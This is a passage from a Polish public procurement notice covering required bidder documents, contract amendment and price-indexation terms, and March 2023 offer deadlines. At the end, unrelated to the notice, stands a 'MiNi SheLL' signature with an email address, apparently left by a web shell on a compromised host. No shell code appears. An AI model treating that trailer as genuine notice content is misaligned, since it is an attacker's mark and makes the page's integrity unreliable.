lub ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze (t.j. Dz. U. z 2022 r. poz. 1184 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/>1)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2021 r. poz. 275 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/>1)	wykazu osób, o których mowa, w Rozdziale III ust. 2 pkt 3 SWZ, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych/uprawnień oraz doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz osób stanowi Załącznik nr 6 do SWZ. <br/>W związku z treścią ust. 2 pkt 5 Rozdziału V SWZ Zamawiający skieruje do Wykonawcy wezwanie, o którym mowa w niniejszym punkcie wyłącznie w zakresie, który w odniesieniu do warunków udziału w postępowaniu nie został uzupełniony w wykazie złożonym wraz z ofertą.<br/><br/>2)	wykazu usług, o których mowa, w Rozdziale III ust. 2 pkt 1-2 SWZ, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat liczonym wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Wykaz usług stanowi Załącznik nr 7 do SWZ.<br/><br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy liczonym wstecz od dnia, w którym upływa termin składania ofert. <br/><br/>3)	dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wraz z formularzem oferty Wykonawca zobowiązany jest złożyć:<br/><br/>1)	oświadczenie stanowiące dowód potwierdzający na dzień składania ofert spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia, zastępujące tymczasowo podmiotowe środki dowodowe, sporządzone wg wzoru stanowiącego Załącznik nr 2 do SWZ. <br/><br/>2)	dokument, z którego wynika zakres umocowania do działania w imieniu Wykonawcy w postępowaniu o udzielenie zamówienia: <br/>a)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/><br/>UWAGA: Wykonawca nie jest zobowiązany do złożenia dokumentu, jeżeli dokument Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. <br/><br/>b)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit. a. <br/><br/>UWAGA: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zasady określone w lit. b stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>3)	oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego musi wynikać, które usługi wykonają poszczególni Wykonawcy (dotyczy wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie warunku udziału w postępowaniu wskazanego w rozdziale III ust. 2 pkt 1-3 SWZ). Oświadczenie stanowi Załącznik nr 3 do SWZ. <br/><br/>4)	zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu (jeżeli dotyczy). Wzór zobowiązania stanowi Załącznik nr 4 do SWZ.<br/><br/>Zobowiązanie podmiotu udostępniającego zasoby musi potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a)	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b)	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>c)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/><br/>5)	podmiotowy środek dowodowy potwierdzający spełnienie warunku udziału w postępowaniu, o którym mowa w Rozdziale III SWZ oraz potwierdzający doświadczenie punktowane w ramach kryterium oceny ofert – wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych/uprawnień oraz doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz osób stanowi Załącznik nr 6 do SWZ (dalej: „Wykaz osób”, „wykaz osób”). <br/><br/>Jeżeli Wykonawca nie wskazuje doświadczenia osób w celu uzyskania punktów w kryterium oceny ofert, Wykaz osób w odniesieniu do wszystkich osób wymaganych w warunku udziału w postępowaniu składa zgodnie z zasadami określonymi w ust. 3 Rozdziału V SWZ (na wezwanie Zamawiającego). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień Umowy może nastąpić w formie pisemnej pod rygorem nieważności w następujących przypadkach:<br/>1)	niezbędna jest zmiana sposobu realizacji Umowy z uwagi na okoliczności, których nie można było przewidzieć w momencie zawierania Umowy, a które uniemożliwiłyby wykonanie przedmiotu Umowy zgodnie z jego treścią i celem; <br/>2)	w toku realizacji przedmiotu Umowy wynikną rozbieżności lub niejasności w jej treści, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie postanowień Umowy w stopniu wyłączającym dopuszczalność różnej interpretacji zapisów Umowy przez Strony;<br/>3)	zmiany obowiązujących przepisów prawa, jeżeli konieczne będzie dostosowanie treści postanowień Umowy do aktualnego stanu prawnego;<br/>4)	wystąpienia zdarzeń siły wyższej, rozumianych jako zdarzenia zewnętrznie niemożliwe do przewidzenia i niemożliwe do zapobieżenia, które będą miały wpływ na sposób, częstotliwość lub terminy świadczenia usług objętych przedmiotem Umowy, jak również wysokość wynagrodzenia umówionego przez Strony.<br/>2.	Strony przewidują dodatkowo zmianę wysokości wynagrodzenia umownego w przypadku zmiany podczas realizacji przedmiotu Umowy: <br/>1)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania przedmiotu Umowy, a proponowana przez Wykonawcę zmiana wynagrodzenia odpowiadać będzie wyłącznie ich faktycznemu wzrostowi wskutek zaistnienia wskazanych powyżej okoliczności i zostanie zgłoszona Zamawiającemu w terminie 30 dni od daty wejścia w życie przepisów wprowadzających te zmiany zgodnie z ust. 6.<br/>3.	Koszt wykonania Umowy, o którym mowa w ust. 2 ulegnie zwiększeniu o udokumentowaną przez Wykonawcę kwotę rzeczywiście poniesionych kosztów wynikających ze zmiany ww. przepisów. Ciężar udowodnienia poniesionych kosztów leży po stronie Wykonawcy. Wykonawca powinien również wykazać, że koszty te realnie wzrosły i nie mogły być pokryte mimo wzrostu wynagrodzenia wskazanego w ust. 4, jeżeli takie wcześniej miało miejsce. Zmiana wynagrodzenia nastąpi od dnia wejścia w życie przepisów wprowadzających w życie zmiany określone w ust. 2. <br/> - dalsza część została opisania w informacjach dodatkowych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pierog.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-16 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. informacji dot. rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia: <br/>4.	Ponadto Strony ustaliły, że ustalone wynagrodzenie będzie waloryzowane o wskaźnik cen towarów i usług konsumpcyjnych (kwartał do poprzedniego kwartału) ogłaszany w komunikacie Prezesa Głównego Urzędu Statystycznego (dalej jako „Wyjściowy wskaźnik waloryzacji ”), przy łącznym spełnieniu następujących postanowień:<br/>1)	każda ze Stron Umowy jest uprawniona do żądania zmiany wysokości wynagrodzenia, przy czym waloryzacja nastąpi na wniosek Strony, przy czym<br/>2)	każda ze Stron Umowy jest uprawniona do żądania zmiany wysokości wynagrodzenia nie częściej niż raz na 6 miesięcy, przy czym Strona może wystąpić z wnioskiem o pierwszą waloryzację po 6 miesiącach od dnia zawarcia Umowy oraz o każdą kolejną nie wcześniej niż po upływie 6 miesięcy od poprzedniej waloryzacji, przy wzroście lub obniżeniu Wskaźnika waloryzacji o co najmniej 2%, obliczonego jako średnia Wyjściowych wskaźników waloryzacji za ostatnie dwa kwartały poprzedzające złożenie wniosku o waloryzację; w przypadku wzrostu lub obniżenia Wskaźnika waloryzacji waloryzacja będzie polegała odpowiednio na wzroście lub obniżeniu wynagrodzenia za usługi realizowane po dniu złożenia wniosku o wartość procentową Wskaźnika waloryzacji, przy czym<br/>3)	waloryzacja nie dotyczy usług zrealizowanych przed datą złożenia wniosku przez którąkolwiek ze Stron, przy czym<br/>4)	w przypadku likwidacji Wyjściowego wskaźnika waloryzacji lub zmiany podmiotu, który urzędowo go ustala, mechanizm, o którym mowa powyżej, stosuje się odpowiednio do wskaźnika i podmiotu, który zgodnie z odpowiednimi przepisami prawa zastąpi dotychczasowy Wskaźnik lub podmiot, przy czym<br/>5)	maksymalna wartość zmiany wynagrodzenia brutto, jaką dopuszcza Zamawiający w efekcie zastosowania niniejszych postanowień, nie przekroczy 10% łącznego wynagrodzenia brutto Wykonawcy, o którym mowa w § 7 ust.1 Umowy.<br/>5.	Jeżeli wynagrodzenie Wykonawcy zostało zmienione w trybie wskazanym w ust. 4 Wykonawca zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę na okres co najmniej 6 miesięcy. W każdym przypadku zmiany Umowy, o której mowa w ust. 4, Wykonawca w terminie 30 dni przedłoży Zamawiającemu oświadczenie o dokonaniu odpowiedniej zmiany w umowie podwykonawczej, jeżeli przy wykonywaniu Umowy korzysta z usług podwykonawców.<br/>6.	Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania Umowy zawierające opis proponowanych zmian i ich uzasadnienie. <br/>7.	Każda ze Stron może w terminie 30 dni od otrzymania wniosku o zmianę, o którym mowa w ust. 6, zwrócić się do Strony wnioskującej o jego uzupełnienie, poprzez przekazanie dodatkowych wyjaśnień, informacji lub dokumentów (np. zażądać oryginałów do wglądu lub kopii potwierdzonych za zgodność z oryginałami).<br/>8.	W terminie 30 dni od otrzymania kompletnego wniosku Strona zajmie wobec niego pisemne stanowisko. Za dzień przekazania stanowiska uznaje się dzień jego wysłania na adres właściwy dla doręczeń drugiej Strony.<br/>9.	Zmiany i uzupełnienia dotyczące Umowy, za wyjątkiem tych wyraźnie określonych w Umowie, wymagają formy pisemnej pod rygorem nieważności.

Creat By MiNi SheLL
Email: jattceo@gmail.com